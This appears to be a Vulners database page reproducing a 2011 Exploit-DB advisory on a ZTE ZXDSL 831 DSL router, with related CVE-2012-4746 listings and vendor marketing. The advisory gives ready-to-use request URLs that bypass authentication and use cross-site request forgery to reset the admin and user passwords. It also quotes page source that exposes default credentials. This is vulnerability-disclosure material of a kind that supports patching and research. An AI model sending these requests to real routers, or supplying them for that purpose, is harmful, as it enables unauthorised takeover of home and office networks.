Lucene search
+L

ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities

🗓️ 01 Nov 2011 00:00:00Reported by mehdi boukazoulaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 101 Views

ZTE ZXDSL 831IIV7.5.0a_Z29_OV Multiple Vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2012-4746
31 Aug 201222:00
cve
cvelist
Cvelist
CVE-2012-4746
31 Aug 201222:00
cvelist
exploitdb
Exploit DB
ZTE - Change Admin Password
8 Apr 201200:00
exploitdb
euvd
EUVD
EUVD-2012-4671
7 Oct 202500:30
euvd
nvd
NVD
CVE-2012-4746
31 Aug 201222:55
nvd
prion
Prion
Cross site request forgery (csrf)
31 Aug 201222:55
prion
redhatcve
RedhatCVE
CVE-2012-4746
22 May 202502:51
redhatcve
# Exploit Title: ZTE ZXDSL 831IIV7.5.0a_Z29_OV Multiple vulnerabilities
# Date: 28 / 10 / 2011 .
# Authors: Mehdi Boukazoula ; Ibrahim Debeche .
# Software Link with patch :
# Version: v 831IIV7.5.0a_Z29_OV
# Tested on: v 831IIV7.5.0a_Z29_OV, May Affect all ZTE routers !!
# Description :

1 - Authentication bypass + Cross Site Request forgery
To bypass authentication go to URL : http://192.168.1.1/accessaccount.cgi
To get request forgery; The attacker can request from his browser without cookie or any authentication, or send link to the Administrator :

USER ACCOUNT : http://192.168.1.1/accessaccount.cgi?usrUserName=user&usrPassword=111111
ADMIN ACCOUNT : http://192.168.1.1/accessaccount.cgi?sysUserName=admin&sysPassword=111111

2 - Script revealing sensitive information on source of page "accessaccount.cgi":

function frmLoad()
{
   with ( document.forms.adminaccount ) {
      sysUserName.value = 'admin';
      sysPassword.value = '43210';
      syscfmPwd.value = '43210';

      usrUserName.value = 'user';
      usrPassword.value = '111111';
      usrcfmPwd.value = '111111';
   }
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Nov 2011 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 26.8
EPSS0.0109
101